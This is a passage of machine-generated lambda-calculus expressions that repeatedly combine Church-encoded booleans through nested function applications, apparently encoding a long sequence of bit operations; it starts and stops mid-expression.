lambda s_43 ((38)(43))(38))(8))((lambda s_198 lambda s_53 lambda s_51 ((198)(51))(53))
(113))))(((lambda s_165 lambda s_91 ((165)(91))(165))((lambda s_181 lambda s_221 lambda
s_155 ((181)(155))(221))(8)))(113)))(lambda s_0 lambda s_1 1))(lambda s_96 lambda s_91
96))))(((lambda s_104 lambda s_153 ((lambda s_232 lambda s_2 ((232)(232))(2))(((lambda
s_242 lambda s_127 ((242)(127))(242))(153))((lambda s_67 lambda s_155 lambda s_54 ((67)
(54))(155))(104))))(((lambda s_112 lambda s_56 ((112)(56))(112))((lambda s_173 lambda
s_143 lambda s_47 ((173)(47))(143))(153)))(104)))(lambda s_1 lambda s_0 0))(lambda
s_167 lambda s_67 167))))(((lambda s_119 lambda s_81 ((lambda s_153 lambda s_248 ((153)
(153))(248))(((lambda s_15 lambda s_117 ((15)(117))(15))(81))((lambda s_137 lambda
s_174 lambda s_159 ((137)(159))(174))(119))))(((lambda s_120 lambda s_177 ((120)(177))
(120))((lambda s_26 lambda s_136 lambda s_143 ((26)(143))(136))(81)))(119)))(lambda s_1
lambda s_0 1))(lambda s_29 lambda s_136 136))))(((lambda s_108 lambda s_6 ((lambda s_29
lambda s_250 ((29)(29))(250))(((lambda s_205 lambda s_103 ((205)(103))(205))(6))
((lambda s_241 lambda s_82 lambda s_211 ((241)(211))(82))(108))))(((lambda s_166 lambda
s_241 ((166)(241))(166))((lambda s_88 lambda s_176 lambda s_131 ((88)(131))(176))(6)))
(108)))(lambda s_0 lambda s_1 1))(lambda s_57 lambda s_214 57))))(((lambda s_65 lambda
s_250 ((lambda s_52 lambda s_68 ((52)(52))(68))(((lambda s_66 lambda s_68 ((66)(68))
(66))(250))((lambda s_165 lambda s_162 lambda s_255 ((165)(255))(162))(65))))(((lambda
s_55 lambda s_53 ((55)(53))(55))((lambda s_98 lambda s_134 lambda s_179 ((98)(179))
(134))(250)))(65)))(lambda s_0 lambda s_1 0))(lambda s_133 lambda s_87 87))))(((lambda
s_216 lambda s_203 ((lambda s_207 lambda s_42 ((207)(207))(42))(((lambda s_160 lambda
s_120 ((160)(120))(160))(203))((lambda s_74 lambda s_241 lambda s_205 ((74)(205))(241))
(216))))(((lambda s_22 lambda s_167 ((22)(167))(22))((lambda s_249 lambda s_86 lambda
s_10 ((249)(10))(86))(203)))(216)))(lambda s_1 lambda s_0 1))(lambda s_105 lambda s_103
103))))(((lambda s_255 lambda s_71 ((lambda s_3 lambda s_244 ((3)(3))(244))(((lambda
s_205 lambda s_147 ((205)(147))(205))(71))((lambda s_233 lambda s_95 lambda s_159
((233)(159))(95))(255))))(((lambda s_187 lambda s_10 ((187)(10))(187))((lambda s_4
lambda s_108 lambda s_119 ((4)(119))(108))(71)))(255)))(lambda s_1 lambda s_0 1))
(lambda s_40 lambda s_2 2))))(((lambda s_242 lambda s_56 ((lambda s_104 lambda s_197
((104)(104))(197))(((lambda s_82 lambda s_26 ((82)(26))(82))(56))((lambda s_203 lambda
s_253 lambda s_222 ((203)(222))(253))(242))))(((lambda s_219 lambda s_103 ((219)(103))
(219))((lambda s_104 lambda s_72 lambda s_5 ((104)(5))(72))(56)))(242)))(lambda s_0
lambda s_1 1))(lambda s_74 lambda s_198 74))))(((lambda s_17 lambda s_131 ((lambda
s_203 lambda s_205 ((203)(203))(205))(((lambda s_129 lambda s_166 ((129)(166))(129))
(131))((lambda s_58 lambda s_132 lambda s_99 ((58)(99))(132))(17))))(((lambda s_239
lambda s_39 ((239)(39))(239))((lambda s_224 lambda s_15 lambda s_193 ((224)(193))(15))
(131)))(17)))(lambda s_0 lambda s_1 1))(lambda s_111 lambda s_136 111))))(((lambda
s_173 lambda s_242 ((lambda s_62 lambda s_100 ((62)(62))(100))(((lambda s_229 lambda
s_178 ((229)(178))(229))(242))((lambda s_193 lambda s_120 lambda s_17 ((193)(17))(120))
(173))))(((lambda s_237 lambda s_89 ((237)(89))(237))((lambda s_171 lambda s_123 lambda
s_27 ((171)(27))(123))(242)))(173)))(lambda s_0 lambda s_1 0))(lambda s_207 lambda
s_219 219))))(((lambda s_3 lambda s_102 ((lambda s_174 lambda s_138 ((174)(174))(138))
(((lambda s_83 lambda s_103 ((83)(103))(83))(102))((lambda s_68 lambda s_211 lambda s_9
((68)(9))(211))(3))))(((lambda s_224 lambda s_109 ((224)(109))(224))((lambda s_199
lambda s_182 lambda s_88 ((199)(88))(182))(102)))(3)))(lambda s_0 lambda s_1 1))(lambda
s_174 lambda s_250 174))))(((lambda s_245 lambda s_151 ((lambda s_152 lambda s_181
((152)(152))(181))(((lambda s_232 lambda s_44 ((232)(44))(232))(151))((lambda s_2
lambda s_239 lambda s_33 ((2)(33))(239))(245))))(((lambda s_38 lambda s_77 ((38)(77))
(38))((lambda s_0 lambda s_232 lambda s_59 ((0)(59))(232))(151)))(245)))(lambda s_0
lambda s_1 0))(lambda s_155 lambda s_253 253))))(((lambda s_218 lambda s_158 ((lambda
s_61 lambda s_126 ((61)(61))(126))(((lambda s_40 lambda s_184 ((40)(184))(40))(158))
((lambda s_73 lambda s_47 lambda s_97 ((73)(97))(47))(218))))(((lambda s_42 lambda
s_148 ((42)(148))(42))((lambda s_143 lambda s_109 lambda s_147 ((143)(147))(109))
(158)))(218)))(lambda s_1 lambda s_0 0))(lambda s_55 lambda s_188 55))))(((lambda s_63
lambda s_152 ((lambda s_189 lambda s_217 ((189)(189))(217))(((lambda s_90 lambda s_147
((90)(147))(90))(152))((lambda s_5 lambda s_205 lambda s_8 ((5)(8))(205))(63))))
(((lambda s_205 lambda s_198 ((205)(198))(205))((lambda s_92 lambda s_159 lambda s_59
((92)(59))(159))(152)))(63)))(lambda s_0 lambda s_1 0))(lambda s_54 lambda s_69 69))))
(((lambda s_197 lambda s_85 ((lambda s_86 lambda s_124 ((86)(86))(124))(((lambda s_193
lambda s_98 ((193)(98))(193))(85))((lambda s_196 lambda s_132 lambda s_146 ((196)(146))
(132))(197))))(((lambda s_235 lambda s_4 ((235)(4))(235))((lambda s_175 lambda s_190
lambda s_163 ((175)(163))(190))(85)))(197)))(lambda s_0 lambda s_1 1))(lambda s_163
lambda s_202 163))))(((lambda s_104 lambda s_131 ((lambda s_218 lambda s_212 ((218)
(218))(212))(((lambda s_155 lambda s_221 ((155)(221))(155))(131))((lambda s_217 lambda
s_103 lambda s_233 ((217)(233))(103))(104))))(((lambda s_78 lambda s_136 ((78)(136))
(78))((lambda s_188 lambda s_208 lambda s_234 ((188)(234))(208))(131)))(104)))(lambda
s_0 lambda s_1 1))(lambda s_221 lambda s_238 221))))(((lambda s_188 lambda s_76
((lambda s_215 lambda s_33 ((215)(215))(33))(((lambda s_254 lambda s_125 ((254)(125))
(254))(76))((lambda s_6 lambda s_133 lambda s_110 ((6)(110))(133))(188))))(((lambda s_3
lambda s_122 ((3)(122))(3))((lambda s_151 lambda s_84 lambda s_22 ((151)(22))(84))
(76)))(188)))(lambda s_0 lambda s_1 0))(lambda s_210 lambda s_250 250))))(((lambda
s_115 lambda s_238 ((lambda s_138 lambda s_233 ((138)(138))(233))(((lambda s_38 lambda
s_250 ((38)(250))(38))(238))((lambda s_227 lambda s_242 lambda s_195 ((227)(195))(242))
(115))))(((lambda s_81 lambda s_88 ((81)(88))(81))((lambda s_220 lambda s_245 lambda
s_24 ((220)(24))(245))(238)))(115)))(lambda s_0 lambda s_1 0))(lambda s_38 lambda s_14
14))))(((lambda s_161 lambda s_51 ((lambda s_213 lambda s_237 ((213)(213))(237))
(((lambda s_14 lambda s_36 ((14)(36))(14))(51))((lambda s_228 lambda s_71 lambda s_178
((228)(178))(71))(161))))(((lambda s_178 lambda s_245 ((178)(245))(178))((lambda s_231
lambda s_40 lambda s_151 ((231)(151))(40))(51)))(161)))(lambda s_0 lambda s_1 0))
(lambda s_255 lambda s_235 235))))(((lambda s_126 lambda s_142 ((lambda s_185 lambda
s_225 ((185)(185))(225))(((lambda s_80 lambda s_124 ((80)(124))(80))(142))((lambda
s_173 lambda s_145 lambda s_119 ((173)(119))(145))(126))))(((lambda s_252 lambda s_117
((252)(117))(252))((lambda s_20 lambda s_25 lambda s_186 ((20)(186))(25))(142)))(126)))
(lambda s_1 lambda s_0 0))(lambda s_245 lambda s_124 245))))(((lambda s_229 lambda s_57
((lambda s_58 lambda s_233 ((58)(58))(233))(((lambda s_155 lambda s_116 ((155)(116))
(155))(57))((lambda s_66 lambda s_214 lambda s_209 ((66)(209))(214))(229))))(((lambda
s_146 lambda s_206 ((146)(206))(146))((lambda s_60 lambda s_135 lambda s_102 ((60)
(102))(135))(57)))(229)))(lambda s_0 lambda s_1 1))(lambda s_158 lambda s_147 158))))
(((lambda s_124 lambda s_53 ((lambda s_144 lambda s_235 ((144)(144))(235))(((lambda s_6
lambda s_96 ((6)(96))(6))(53))((lambda s_127 lambda s_93 lambda s_51 ((127)(51))(93))
(124))))(((lambda s_250 lambda s_74 ((250)(74))(250))((lambda s_9 lambda s_30 lambda
s_22 ((9)(22))(30))(53)))(124)))(lambda s_0 lambda s_1 0))(lambda s_123 lambda s_169
169))))(((lambda s_194 lambda s_102 ((lambda s_222 lambda s_105 ((222)(222))(105))
(((lambda s_198 lambda s_228 ((198)(228))(198))(102))((lambda s_29 lambda s_169 lambda
s_232 ((29)(232))(169))(194))))(((lambda s_135 lambda s_40 ((135)(40))(135))((lambda
s_46 lambda s_148 lambda s_83 ((46)(83))(148))(102)))(194)))(lambda s_1 lambda s_0 1))
(lambda s_237 lambda s_199 199))))(((lambda s_253 lambda s_204 ((lambda s_165 lambda
s_236 ((165)(165))(236))(((lambda s_4 lambda s_120 ((4)(120))(4))(204))((lambda s_233
lambda s_102 lambda s_212 ((233)(212))(102))(253))))(((lambda s_163 lambda s_93 ((163)
(93))(163))((lambda s_172 lambda s_183 lambda s_210 ((172)(210))(183))(204)))(253)))
(lambda s_1 lambda s_0 1))(lambda s_92 lambda s_220 220))))(((lambda s_123 lambda s_12
((lambda s_77 lambda s_209 ((77)(77))(209))(((lambda s_40 lambda s_10 ((40)(10))(40))
(12))((lambda s_155 lambda s_103 lambda s_244 ((155)(244))(103))(123))))(((lambda s_203
lambda s_132 ((203)(132))(203))((lambda s_184 lambda s_68 lambda s_24 ((184)(24))(68))
(12)))(123)))(lambda s_0 lambda s_1 0))(lambda s_172 lambda s_77 77))))(((lambda s_128
lambda s_91 ((lambda s_186 lambda s_86 ((186)(186))(86))(((lambda s_213 lambda s_64
((213)(64))(213))(91))((lambda s_204 lambda s_87 lambda s_31 ((204)(31))(87))(128))))
(((lambda s_207 lambda s_25 ((207)(25))(207))((lambda s_115 lambda s_74 lambda s_223
((115)(223))(74))(91)))(128)))(lambda s_1 lambda s_0 0))(lambda s_253 lambda s_94
253))))(((lambda s_189 lambda s_241 ((lambda s_129 lambda s_162 ((129)(129))(162))
(((lambda s_242 lambda s_200 ((242)(200))(242))(241))((lambda s_239 lambda s_255 lambda
s_172 ((239)(172))(255))(189))))(((lambda s_233 lambda s_116 ((233)(116))(233))((lambda
s_206 lambda s_166 lambda s_248 ((206)(248))(166))(241)))(189)))(lambda s_0 lambda s_1
1))(lambda s_111 lambda s_51 111))))(((lambda s_30 lambda s_182 ((lambda s_40 lambda
s_208 ((40)(40))(208))(((lambda s_6 lambda s_83 ((6)(83))(6))(182))((lambda s_243
lambda s_95 lambda s_210 ((243)(210))(95))(30))))(((lambda s_39 lambda s_141 ((39)
(141))(39))((lambda s_173 lambda s_210 lambda s_200 ((173)(200))(210))(182)))(30)))
(lambda s_1 lambda s_0 0))(lambda s_210 lambda s_184 210))))(((lambda s_175 lambda s_24
((lambda s_118 lambda s_155 ((118)(118))(155))(((lambda s_168 lambda s_156 ((168)(156))
(168))(24))((lambda s_116 lambda s_31 lambda s_165 ((116)(165))(31))(175))))(((lambda
s_70 lambda s_211 ((70)(211))(70))((lambda s_9 lambda s_197 lambda s_34 ((9)(34))(197))
(24)))(175)))(lambda s_0 lambda s_1 1))(lambda s_84 lambda s_6 84))))(((lambda s_43
lambda s_89 ((lambda s_33 lambda s_177 ((33)(33))(177))(((lambda s_175 lambda s_43
((175)(43))(175))(89))((lambda s_81 lambda s_45 lambda s_69 ((81)(69))(45))(43))))
(((lambda s_179 lambda s_46 ((179)(46))(179))((lambda s_54 lambda s_57 lambda s_205
((54)(205))(57))(89)))(43)))(lambda s_0 lambda s_1 1))(lambda s_246 lambda s_237
246))))(((lambda s_114 lambda s_23 ((lambda s_84 lambda s_167 ((84)(84))(167))(((lambda
s_125 lambda s_190 ((125)(190))(125))(23))((lambda s_232 lambda s_69 lambda s_202
((232)(202))(69))(114))))(((lambda s_59 lambda s_89 ((59)(89))(59))((lambda s_11 lambda
s_196 lambda s_49 ((11)(49))(196))(23)))(114)))(lambda s_1 lambda s_0 0))(lambda s_78
lambda s_245 78))))(((lambda s_216 lambda s_36 ((lambda s_8 lambda s_216 ((8)(8))(216))
(((lambda s_208 lambda s_149 ((208)(149))(208))(36))((lambda s_174 lambda s_150 lambda
s_165 ((174)(165))(150))(216))))(((lambda s_132 lambda s_133 ((132)(133))(132))((lambda
s_171 lambda s_44 lambda s_28 ((171)(28))(44))(36)))(216)))(lambda s_1 lambda s_0 1))
(lambda s_35 lambda s_227 227))))(((lambda s_249 lambda s_120 ((lambda s_70 lambda s_17
((70)(70))(17))(((lambda s_86 lambda s_88 ((86)(88))(86))(120))((lambda s_62 lambda
s_64 lambda s_70 ((62)(70))(64))(249))))(((lambda s_227 lambda s_57 ((227)(57))(227))
((lambda s_53 lambda s_122 lambda s_27 ((53)(27))(122))(120)))(249)))(lambda s_1 lambda
s_0 1))(lambda s_140 lambda s_132 132))))(((lambda s_197 lambda s_229 ((lambda s_33
lambda s_74 ((33)(33))(74))(((lambda s_200 lambda s_86 ((200)(86))(200))(229))((lambda
s_24 lambda s_229 lambda s_135 ((24)(135))(229))(197))))(((lambda s_254 lambda s_253
((254)(253))(254))((lambda s_174 lambda s_2 lambda s_111 ((174)(111))(2))(229)))(197)))
(lambda s_1 lambda s_0 0))(lambda s_71 lambda s_63 71))))(((lambda s_53 lambda s_189
((lambda s_2 lambda s_63 ((2)(2))(63))(((lambda s_41 lambda s_148 ((41)(148))(41))
(189))((lambda s_101 lambda s_199 lambda s_108 ((101)(108))(199))(53))))(((lambda s_118
lambda s_161 ((118)(161))(118))((lambda s_206 lambda s_147 lambda s_51 ((206)(51))
(147))(189)))(53)))(lambda s_1 lambda s_0 0))(lambda s_112 lambda s_144 112))))
(((lambda s_22 lambda s_213 ((lambda s_146 lambda s_80 ((146)(146))(80))(((lambda s_144
lambda s_117 ((144)(117))(144))(213))((lambda s_151 lambda s_34 lambda s_69 ((151)(69))
(34))(22))))(((lambda s_36 lambda s_129 ((36)(129))(36))((lambda s_244 lambda s_17
lambda s_46 ((244)(46))(17))(213)))(22)))(lambda s_0 lambda s_1 1))(lambda s_3 lambda
s_155 3))))(((lambda s_225 lambda s_35 ((lambda s_124 lambda s_96 ((124)(124))(96))
(((lambda s_154 lambda s_71 ((154)(71))(154))(35))((lambda s_198 lambda s_114 lambda
s_210 ((198)(210))(114))(225))))(((lambda s_68 lambda s_77 ((68)(77))(68))((lambda s_88
lambda s_169 lambda s_8 ((88)(8))(169))(35)))(225)))(lambda s_0 lambda s_1 0))(lambda
s_210 lambda s_169 169))))(((lambda s_159 lambda s_163 ((lambda s_111 lambda s_65
((111)(111))(65))(((lambda s_223 lambda s_21 ((223)(21))(223))(163))((lambda s_98
lambda s_45 lambda s_119 ((98)(119))(45))(159))))(((lambda s_203 lambda s_212 ((203)
(212))(203))((lambda s_38 lambda s_94 lambda s_220 ((38)(220))(94))(163)))(159)))
(lambda s_0 lambda s_1 0))(lambda s_242 lambda s_16 16))))(((lambda s_243 lambda s_196
((lambda s_109 lambda s_133 ((109)(109))(133))(((lambda s_10 lambda s_144 ((10)(144))
(10))(196))((lambda s_38 lambda s_36 lambda s_212 ((38)(212))(36))(243))))(((lambda
s_125 lambda s_221 ((125)(221))(125))((lambda s_81 lambda s_91 lambda s_136 ((81)(136))
(91))(196)))(243)))(lambda s_0 lambda s_1 0))(lambda s_251 lambda s_191 191))))
(((lambda s_77 lambda s_68 ((lambda s_54 lambda s_129 ((54)(54))(129))(((lambda s_252
lambda s_144 ((252)(144))(252))(68))((lambda s_22 lambda s_74 lambda s_229 ((22)(229))
(74))(77))))(((lambda s_26 lambda s_105 ((26)(105))(26))((lambda s_99 lambda s_35
lambda s_255 ((99)(255))(35))(68)))(77)))(lambda s_0 lambda s_1 0))(lambda s_151 lambda
s_7 7))))(((lambda s_73 lambda s_218 ((lambda s_216 lambda s_110 ((216)(216))(110))
(((lambda s_157 lambda s_94 ((157)(94))(157))(218))((lambda s_198 lambda s_86 lambda
s_126 ((198)(126))(86))(73))))(((lambda s_64 lambda s_168 ((64)(168))(64))((lambda s_57
lambda s_111 lambda s_240 ((57)(240))(111))(218)))(73)))(lambda s_0 lambda s_1 1))
(lambda s_52 lambda s_214 52))))(((lambda s_0 lambda s_45 ((lambda s_15 lambda s_73
((15)(15))(73))(((lambda s_185 lambda s_240 ((185)(240))(185))(45))((lambda s_28 lambda
s_33 lambda s_226 ((28)(226))(33))(0))))(((lambda s_27 lambda s_106 ((27)(106))(27))
((lambda s_178 lambda s_145 lambda s_42 ((178)(42))(145))(45)))(0)))(lambda s_1 lambda
s_0 0))(lambda s_89 lambda s_25 89))))(((lambda s_157 lambda s_33 ((lambda s_105 lambda
s_129 ((105)(105))(129))(((lambda s_223 lambda s_131 ((223)(131))(223))(33))((lambda
s_31 lambda s_50 lambda s_166 ((31)(166))(50))(157))))(((lambda s_147 lambda s_42
((147)(42))(147))((lambda s_92 lambda s_99 lambda s_98 ((92)(98))(99))(33)))(157)))
(lambda s_0 lambda s_1 0))(lambda s_215 lambda s_245 245))))(((lambda s_126 lambda s_45
((lambda s_72 lambda s_86 ((72)(72))(86))(((lambda s_239 lambda s_122 ((239)(122))
(239))(45))((lambda s_170 lambda s_116 lambda s_24 ((170)(24))(116))(126))))(((lambda
s_197 lambda s_37 ((197)(37))(197))((lambda s_86 lambda s_232 lambda s_28 ((86)(28))
(232))(45)))(126)))(lambda s_0 lambda s_1 0))(lambda s_150 lambda s_155 155))))
(((lambda s_223 lambda s_54 ((lambda s_227 lambda s_219 ((227)(227))(219))(((lambda
s_66 lambda s_113 ((66)(113))(66))(54))((lambda s_20 lambda s_118 lambda s_170 ((20)
(170))(118))(223))))(((lambda s_223 lambda s_96 ((223)(96))(223))((lambda s_31 lambda
s_130 lambda s_128 ((31)(128))(130))(54)))(223)))(lambda s_1 lambda s_0 1))(lambda s_14
lambda s_243 243))))(((lambda s_150 lambda s_238 ((lambda s_54 lambda s_129 ((54)(54))
(129))(((lambda s_160 lambda s_249 ((160)(249))(160))(238))((lambda s_23 lambda s_159
lambda s_161 ((23)(161))(159))(150))))(((lambda s_211 lambda s_127 ((211)(127))(211))
((lambda s_203 lambda s_117 lambda s_81 ((203)(81))(117))(238)))(150)))(lambda s_0
lambda s_1 0))(lambda s_88 lambda s_82 82))))(((lambda s_177 lambda s_164 ((lambda
s_178 lambda s_94 ((178)(178))(94))(((lambda s_111 lambda s_17 ((111)(17))(111))(164))
((lambda s_123 lambda s_106 lambda s_151 ((123)(151))(106))(177))))(((lambda s_242
lambda s_126 ((242)(126))(242))((lambda s_138 lambda s_87 lambda s_173 ((138)(173))
(87))(164)))(177)))(lambda s_1 lambda s_0 0))(lambda s_165 lambda s_64 165))))(((lambda
s_181 lambda s_29 ((lambda s_177 lambda s_11 ((177)(177))(11))(((lambda s_44 lambda
s_224 ((44)(224))(44))(29))((lambda s_166 lambda s_143 lambda s_114 ((166)(114))(143))
(181))))(((lambda s_250 lambda s_175 ((250)(175))(250))((lambda s_150 lambda s_146
lambda s_152 ((150)(152))(146))(29)))(181)))(lambda s_1 lambda s_0 1))(lambda s_32
lambda s_45 45))))(((lambda s_135 lambda s_81 ((lambda s_61 lambda s_188 ((61)(61))
(188))(((lambda s_68 lambda s_13 ((68)(13))(68))(81))((lambda s_57 lambda s_178 lambda
s_41 ((57)(41))(178))(135))))(((lambda s_10 lambda s_144 ((10)(144))(10))((lambda s_240
lambda s_137 lambda s_15 ((240)(15))(137))(81)))(135)))(lambda s_1 lambda s_0 1))
(lambda s_173 lambda s_117 117))))(((lambda s_183 lambda s_136 ((lambda s_133 lambda
s_55 ((133)(133))(55))(((lambda s_203 lambda s_69 ((203)(69))(203))(136))((lambda s_151
lambda s_184 lambda s_190 ((151)(190))(184))(183))))(((lambda s_225 lambda s_155 ((225)
(155))(225))((lambda s_225 lambda s_201 lambda s_182 ((225)(182))(201))(136)))(183)))
(lambda s_1 lambda s_0 0))(lambda s_24 lambda s_175 24))))(((lambda s_177 lambda s_154
((lambda s_191 lambda s_89 ((191)(191))(89))(((lambda s_16 lambda s_5 ((16)(5))(16))
(154))((lambda s_53 lambda s_144 lambda s_204 ((53)(204))(144))(177))))(((lambda s_254
lambda s_226 ((254)(226))(254))((lambda s_11 lambda s_251 lambda s_45 ((11)(45))(251))
(154)))(177)))(lambda s_1 lambda s_0 1))(lambda s_68 lambda s_95 95))))(((lambda s_10
lambda s_69 ((lambda s_38 lambda s_131 ((38)(38))(131))(((lambda s_7 lambda s_36 ((7)
(36))(7))(69))((lambda s_246 lambda s_151 lambda s_26 ((246)(26))(151))(10))))(((lambda
s_139 lambda s_208 ((139)(208))(139))((lambda s_174 lambda s_87 lambda s_88 ((174)(88))
(87))(69)))(10)))(lambda s_0 lambda s_1 0))(lambda s_188 lambda s_82 82))))(((lambda
s_243 lambda s_68 ((lambda s_25 lambda s_203 ((25)(25))(203))(((lambda s_251 lambda
s_149 ((251)(149))(251))(68))((lambda s_110 lambda s_61 lambda s_131 ((110)(131))(61))
(243))))(((lambda s_160 lambda s_162 ((160)(162))(160))((lambda s_85 lambda s_27 lambda
s_212 ((85)(212))(27))(68)))(243)))(lambda s_1 lambda s_0 0))(lambda s_18 lambda s_52
18))))(((lambda s_6 lambda s_109 ((lambda s_153 lambda s_254 ((153)(153))(254))
(((lambda s_113 lambda s_29 ((113)(29))(113))(109))((lambda s_179 lambda s_22 lambda
s_211 ((179)(211))(22))(6))))(((lambda s_79 lambda s_167 ((79)(167))(79))((lambda s_162
lambda s_230 lambda s_117 ((162)(117))(230))(109)))(6)))(lambda s_1 lambda s_0 0))
(lambda s_253 lambda s_112 253))))(((lambda s_7 lambda s_89 ((lambda s_127 lambda s_102
((127)(127))(102))(((lambda s_201 lambda s_229 ((201)(229))(201))(89))((lambda s_63
lambda s_165 lambda s_239 ((63)(239))(165))(7))))(((lambda s_54 lambda s_53 ((54)(53))
(54))((lambda s_253 lambda s_117 lambda s_191 ((253)(191))(117))(89)))(7)))(lambda s_0
lambda s_1 0))(lambda s_165 lambda s_253 253))))(((lambda s_188 lambda s_195 ((lambda
s_5 lambda s_207 ((5)(5))(207))(((lambda s_59 lambda s_231 ((59)(231))(59))(195))
((lambda s_33 lambda s_198 lambda s_14 ((33)(14))(198))(188))))(((lambda s_208 lambda
s_88 ((208)(88))(208))((lambda s_202 lambda s_98 lambda s_34 ((202)(34))(98))(195)))
(188)))(lambda s_1 lambda s_0 0))(lambda s_93 lambda s_223 93))))(((lambda s_187 lambda
s_127 ((lambda s_140 lambda s_58 ((140)(140))(58))(((lambda s_207 lambda s_6 ((207)(6))
(207))(127))((lambda s_222 lambda s_128 lambda s_192 ((222)(192))(128))(187))))
(((lambda s_112 lambda s_63 ((112)(63))(112))((lambda s_164 lambda s_219 lambda s_206
((164)(206))(219))(127)))(187)))(lambda s_1 lambda s_0 1))(lambda s_90 lambda s_65
65))))(((lambda s_12 lambda s_93 ((lambda s_71 lambda s_39 ((71)(71))(39))(((lambda
s_188 lambda s_25 ((188)(25))(188))(93))((lambda s_62 lambda s_104 lambda s_217 ((62)
(217))(104))(12))))(((lambda s_210 lambda s_245 ((210)(245))(210))((lambda s_253 lambda
s_145 lambda s_117 ((253)(117))(145))(93)))(12)))(lambda s_1 lambda s_0 0))(lambda s_48
lambda s_192 48))))(((lambda s_250 lambda s_119 ((lambda s_222 lambda s_27 ((222)(222))
(27))(((lambda s_147 lambda s_134 ((147)(134))(147))(119))((lambda s_252 lambda s_80
lambda s_246 ((252)(246))(80))(250))))(((lambda s_108 lambda s_192 ((108)(192))(108))
((lambda s_93 lambda s_161 lambda s_176 ((93)(176))(161))(119)))(250)))(lambda s_0
lambda s_1 1))(lambda s_247 lambda s_109 247))))(((lambda s_84 lambda s_124 ((lambda
s_2 lambda s_249 ((2)(2))(249))(((lambda s_140 lambda s_247 ((140)(247))(140))(124))
((lambda s_216 lambda s_192 lambda s_162 ((216)(162))(192))(84))))(((lambda s_83 lambda
s_182 ((83)(182))(83))((lambda s_152 lambda s_186 lambda s_172 ((152)(172))(186))
(124)))(84)))(lambda s_0 lambda s_1 1))(lambda s_237 lambda s_105 237))))(((lambda s_75
lambda s_33 ((lambda s_200 lambda s_240 ((200)(200))(240))(((lambda s_27 lambda s_82
((27)(82))(27))(33))((lambda s_87 lambda s_239 lambda s_216 ((87)(216))(239))(75))))
(((lambda s_220 lambda s_111 ((220)(111))(220))((lambda s_161 lambda s_153 lambda s_143
((161)(143))(153))(33)))(75)))(lambda s_0 lambda s_1 1))(lambda s_23 lambda s_118
23))))(((lambda s_184 lambda s_60 ((lambda s_98 lambda s_0 ((98)(98))(0))(((lambda
s_110 lambda s_224 ((110)(224))(110))(60))((lambda s_26 lambda s_88 lambda s_255 ((26)
(255))(88))(184))))(((lambda s_10 lambda s_9 ((10)(9))(10))((lambda s_17 lambda s_212
lambda s_189 ((17)(189))(212))(60)))(184)))(lambda s_1 lambda s_0 1))(lambda s_250
lambda s_134 134))))(((lambda s_53 lambda s_183 ((lambda s_34 lambda s_61 ((34)(34))
(61))(((lambda s_124 lambda s_225 ((124)(225))(124))(183))((lambda s_224 lambda s_77
lambda s_121 ((224)(121))(77))(53))))(((lambda s_34 lambda s_252 ((34)(252))(34))
((lambda s_109 lambda s_42 lambda s_190 ((109)(190))(42))(183)))(53)))(lambda s_0
lambda s_1 1))(lambda s_83 lambda s_151 83))))(((lambda s_248 lambda s_222 ((lambda
s_27 lambda s_67 ((27)(27))(67))(((lambda s_134 lambda s_19 ((134)(19))(134))(222))
((lambda s_49 lambda s_163 lambda s_92 ((49)(92))(163))(248))))(((lambda s_215 lambda
s_156 ((215)(156))(215))((lambda s_79 lambda s_80 lambda s_153 ((79)(153))(80))(222)))
(248)))(lambda s_0 lambda s_1 0))(lambda s_76 lambda s_166 166))))(((lambda s_6 lambda
s_160 ((lambda s_144 lambda s_35 ((144)(144))(35))(((lambda s_109 lambda s_154 ((109)
(154))(109))(160))((lambda s_152 lambda s_250 lambda s_62 ((152)(62))(250))(6))))
(((lambda s_216 lambda s_87 ((216)(87))(216))((lambda s_53 lambda s_117 lambda s_75
((53)(75))(117))(160)))(6)))(lambda s_0 lambda s_1 1))(lambda s_90 lambda s_18 90))))
(((lambda s_70 lambda s_130 ((lambda s_179 lambda s_245 ((179)(179))(245))(((lambda
s_235 lambda s_120 ((235)(120))(235))(130))((lambda s_217 lambda s_21 lambda s_166
((217)(166))(21))(70))))(((lambda s_125 lambda s_136 ((125)(136))(125))((lambda s_56
lambda s_174 lambda s_125 ((56)(125))(174))(130)))(70)))(lambda s_1 lambda s_0 0))
(lambda s_144 lambda s_163 144))))(((lambda s_127 lambda s_205 ((lambda s_39 lambda
s_102 ((39)(39))(102))(((lambda s_91 lambda s_157 ((91)(157))(91))(205))((lambda s_37
lambda s_208 lambda s_168 ((37)(168))(208))(127))))(((lambda s_108 lambda s_11 ((108)
(11))(108))((lambda s_28 lambda s_59 lambda s_131 ((28)(131))(59))(205)))(127)))(lambda
s_0 lambda s_1 1))(lambda s_205 lambda s_42 205))))(((lambda s_29 lambda s_148 ((lambda
s_109 lambda s_171 ((109)(109))(171))(((lambda s_188 lambda s_174 ((188)(174))(188))
(148))((lambda s_146 lambda s_234 lambda s_94 ((146)(94))(234))(29))))(((lambda s_103
lambda s_10 ((103)(10))(103))((lambda s_4 lambda s_151 lambda s_218 ((4)(218))(151))
(148)))(29)))(lambda s_1 lambda s_0 1))(lambda s_159 lambda s_107 107))))(((lambda
s_137 lambda s_212 ((lambda s_193 lambda s_123 ((193)(193))(123))(((lambda s_94 lambda
s_226 ((94)(226))(94))(212))((lambda s_85 lambda s_193 lambda s_239 ((85)(239))(193))
(137))))(((lambda s_227 lambda s_24 ((227)(24))(227))((lambda s_16 lambda s_190 lambda
s_191 ((16)(191))(190))(212)))(137)))(lambda s_0 lambda s_1 0))(lambda s_158 lambda
s_145 145))))(((lambda s_225 lambda s_184 ((lambda s_206 lambda s_117 ((206)(206))
(117))(((lambda s_172 lambda s_183 ((172)(183))(172))(184))((lambda s_157 lambda s_168
lambda s_197 ((157)(197))(168))(225))))(((lambda s_134 lambda s_152 ((134)(152))(134))
((lambda s_164 lambda s_253 lambda s_208 ((164)(208))(253))(184)))(225)))(lambda s_1
lambda s_0 0))(lambda s_213 lambda s_126 213))))(((lambda s_144 lambda s_43 ((lambda
s_48 lambda s_156 ((48)(48))(156))(((lambda s_118 lambda s_114 ((118)(114))(118))(43))
((lambda s_133 lambda s_43 lambda s_185 ((133)(185))(43))(144))))(((lambda s_140 lambda
s_113 ((140)(113))(140))((lambda s_101 lambda s_215 lambda s_219 ((101)(219))(215))
(43)))(144)))(lambda s_1 lambda s_0 0))(lambda s_252 lambda s_201 252))))(((lambda
s_154 lambda s_72 ((lambda s_10 lambda s_255 ((10)(10))(255))(((lambda s_255 lambda s_7
((255)(7))(255))(72))((lambda s_136 lambda s_194 lambda s_59 ((136)(59))(194))(154))))
